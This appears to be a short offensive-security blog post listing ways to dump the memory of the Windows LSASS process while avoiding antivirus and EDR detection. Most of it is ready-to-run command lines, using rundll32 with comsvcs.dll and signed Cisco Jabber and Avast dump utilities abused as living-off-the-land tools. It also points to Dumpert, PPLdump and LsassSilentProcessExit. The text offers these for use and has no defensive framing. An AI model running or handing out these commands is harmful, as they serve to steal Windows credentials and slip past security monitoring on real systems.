A few techniques to avoid AV or EDR detection
rundll32 C:\windows\system32\comsvcs.dll MiniDump "[LSASS_PID] dump.bin full"
2. procdump <process id> instead of the word lsass
Signed Executable which can be used also
3. CiscoJabber : CiscoJabberProcessDump.exe (ps lsass).id c:\temp\lsass.dmp
See original article : https://www.ired.team/offensive-security/credential-access-and-credential-dumping/dump-credentials-from-lsass-process-without-mimikatz
4. Avast Dumper : AvDump.exe –pid 676 –exception_ptr 0 –thread_id 0 –dump_level 1 –dump_file E:\lsass.dmp –min_interval 0
See orginal article : https://www.archcloudlabs.com/projects/dumping-memory-with-av/
5. You can use my fork of Dumpert : https://github.com/k4nfr3/Dumpert
6. You can use PPLDump from itm4n : https://github.com/itm4n/PPLdump
7. A new way, is to use : LsassSilentProcessExit (set automatic dump of a process which is monitored. Add lsass, kill lsass ) : https://github.com/deepinstinct/LsassSilentProcessExit/
0
Recent Comments